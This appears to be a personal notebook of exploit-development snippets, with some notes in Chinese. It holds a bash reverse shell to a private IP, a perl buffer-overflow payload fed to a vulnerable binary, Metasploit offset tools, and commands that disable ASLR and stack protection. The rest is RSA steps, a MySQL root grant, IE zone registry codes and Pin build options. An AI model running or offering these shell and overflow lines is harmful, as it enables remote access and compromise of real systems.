天空

/bin/bash -i >& /dev/tcp/10.16.66.15/3389 0>&1

perl -e ‘print “\xee\xfa\xff\xbf”x270;’ > exploit
./vul.a < exploit

/opt/metasploit/apps/pro/msf3/tools# ./pattern_create.rb 0x100
/opt/metasploit/apps/pro/msf3/tools# ./pattern_offset.rb xxxx

（1）选择一对不同的、足够大的素数p，q。
（2）计算n=pq。
（3）计算f(n)=(p-1)(q-1)，同时对p, q严加保密，不让任何人知道。
（4）找一个与f(n)互质的数e，且1<e<f(n)。
（5）计算d，使得de≡1 mod f(n)。这个公式也可以表达为d ≡e-1 mod f(n)
这里要解释一下，≡是数论中表示同余的符号。公式中，≡符号的左边必须和符号右边同余，也就是两边模运算结果相同。显而易见，不管f(n)取什么值，符号右边1 mod f(n)的结果都等于1；符号的左边d与e的乘积做模运算后的结果也必须等于1。这就需要计算出d的值，让这个同余等式能够成立。
（6）公钥KU=(e,n)，私钥KR=(d,n)。
（7）加密时，先将明文变换成0至n-1的一个整数M。若明文较长，可先分割成适当的组，然后再进行交换。设密文为C，则加密过程为：。
（8）解密过程为：。

mysql -u root -p

mysql> GRANT ALL ON *.* TO root@'hostname' IDENTIFIED BY 'password';

mysql> flush privileges;

Value    Setting
   ------------------------------
   0        My Computer
   1        Local Intranet Zone
   2        Trusted sites Zone
   3        Internet Zone
   4        Restricted Sites Zone

Value    Setting
   ----------------------------------------------------------------------------------
   1001     ActiveX controls and plug-ins: Download signed ActiveX controls
   1004     ActiveX controls and plug-ins: Download unsigned ActiveX controls
   1200     ActiveX controls and plug-ins: Run ActiveX controls and plug-ins
   1201     ActiveX controls and plug-ins: Initialize and script ActiveX controls not marked as safe for scripting
   1206     Miscellaneous: Allow scripting of Internet Explorer Web browser control ^
   1207     Reserved #
   1208     ActiveX controls and plug-ins: Allow previously unused ActiveX controls to run without prompt ^
   1209     ActiveX controls and plug-ins: Allow Scriptlets
   120A     ActiveX controls and plug-ins:
 ActiveX controls and plug-ins: Override Per-Site (domain-based) ActiveX restrictions
   120B     ActiveX controls and plug-ins: Override Per-Site (domain-based) ActiveX restrict
ions
   1400     Scripting: Active scripting
   1402     Scripting: Scripting of Java applets
   1405     ActiveX controls and plug-ins: Script ActiveX controls marked as safe for scripting
   1406     Miscellaneous: Access data sources across domains
   1407     Scripting: Allow Programmatic clipboard access
   1408     Reserved #
   1409     Scripting: Enable XSS Filter
   1601     Miscellaneous: Submit non-encrypted form data
   1604     Downloads: Font download
   1605     Run Java #
   1606     Miscellaneous: Userdata persistence ^
   1607     Miscellaneous: Navigate sub-frames across different domains
   1608     Miscellaneous: Allow META REFRESH * ^
   1609     Miscellaneous: Display mixed content *
   160A     Miscellaneous: Include local directory path when uploading files to a server ^
   1800     Miscellaneous: Installation of desktop items
   1802     Miscellaneous: Drag and drop or copy and paste files
   1803     Downloads: File Download ^
   1804     Miscellaneous: Launching programs and files in an IFRAME
   1805     Launching programs and files in webview #
   1806     Miscellaneous: Launching applications and unsafe files
   1807     Reserved ** #
   1808     Reserved ** #
   1809     Miscellaneous: Use Pop-up Blocker ** ^
   180A     Reserved # 
   180B     Reserved #
   180C     Reserved #
   180D     Reserved #
   180E     Allow OpenSearch queries in Windows Explorer #
   180F     Allow previewing and custom thumbnails of OpenSearch query results in Windows Explorer #
   1A00     User Authentication: Logon
   1A02     Allow persistent cookies that are stored on your computer #
   1A03     Allow per-session cookies (not stored) #
   1A04     Miscellaneous: Don't prompt for client certificate selection when no 
                           certificates or only one certificate exists * ^
   1A05     Allow 3rd party persistent cookies *
   1A06     Allow 3rd party session cookies *
   1A10     Privacy Settings *
   1C00     Java permissions #
   1E05     Miscellaneous: Software channel permissions
   1F00     Reserved ** #
   2000     ActiveX controls and plug-ins: Binary and script behaviors
   2001     .NET Framework-reliant components: Run components signed with Authenticode
   2004     .NET Framework-reliant components: Run components not signed with Authenticode
   2007     .NET Framework-Reliant Components: Permissions for Components with Manifests
   2100     Miscellaneous: Open files based on content, not file extension ** ^
   2101     Miscellaneous: Web sites in less privileged web content zone can navigate into this zone **
   2102     Miscellaneous: Allow script initiated windows without size or position constraints ** ^
   2103     Scripting: Allow status bar updates via script ^
   2104     Miscellaneous: Allow websites to open windows without address or status bars ^
   2105     Scripting: Allow websites to prompt for information using scripted windows ^
   2200     Downloads: Automatic prompting for file downloads ** ^
   2201     ActiveX controls and plug-ins: Automatic prompting for ActiveX controls ** ^
   2300     Miscellaneous: Allow web pages to use restricted protocols for active content **
   2301     Miscellaneous: Use Phishing Filter ^
   2400     .NET Framework: XAML browser applications
   2401     .NET Framework: XPS documents
   2402     .NET Framework: Loose XAML
   2500     Turn on Protected Mode [Vista only setting] #
   2600     Enable .NET Framework setup ^
   2702     ActiveX controls and plug-ins: Allow ActiveX Filtering
   2708     Miscellaneous: Allow dragging of content between domains into the same window
   2709     Miscellaneous: Allow dragging of content between domains into separate windows
   270B     Miscellaneous: Render legacy filters
   270C     ActiveX Controls and plug-ins: Run Antimalware software on ActiveX controls 
 
 
   {AEBA21FA-782A-4A90-978D-B72164C80120}   First Party Cookie *
   {A8A88C49-5EB2-4990-A1A2-0876022C854F}   Third Party Cookie *
 
*  indicates an Internet Explorer 6 or later setting
** indicates a Windows XP Service Pack 2 or later setting
#  indicates a setting that is not displayed in the user interface in Internet Explorer
^  indicates a setting that only has two options, enabled or disabled

uncompyle2-master  to convert the pyc to py

GDBserver   to debug program by gdb via ida 

/proc/sys/kernel/randomize_va_space

echo 0 > /proc/sys/kernel/randomize_va_space

cat  /proc/sys/kernel/randomize_va_space

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
echo 0 | sudo tee /proc/sys/kernel/exec-shield

for compiler switches:

-fno-stack-protector -z execstack -mpreferred-stack-boundary=2

106879E0

Preprocessor Deefinitions

TARGET_IA32;HOST_IA32;TARGET_WINDOWS;USING_XED

Compiler options:
/MT /EHs- /EHa- /wd4530 /DTARGET_WINDOWS /DBIGARRAY_MULTIPLIER=1
/DUSING_XED /D_CRT_SECURE_NO_DEPRECATE /D_SECURE_SCL=0 /nologo /DTARGET_IA32 /DHOST_IA32

Linker options:
/DLL /EXPORT:main /NODEFAULTLIB /NOLOGO /ENTRY:Ptrace_DllMainCRTStartup@12 ntdll-32.lib libxed.lib pin.lib pinvm.lib libcmt.lib libcpmt.lib /DEBUG

C:\Pin\extras\components\include;C:\Pin\extras\xed2-ia32\include;C:\Pin\source\include\pin\gen;C:\Pin\source\include;c:\Pin\source\include\pin\;$(IncludePath)
C:\Pin\ia32\lib-ext;C:\Pin\ia32\lib;C:\Pin\extras\xed2-ia32\lib;$(LibraryPath)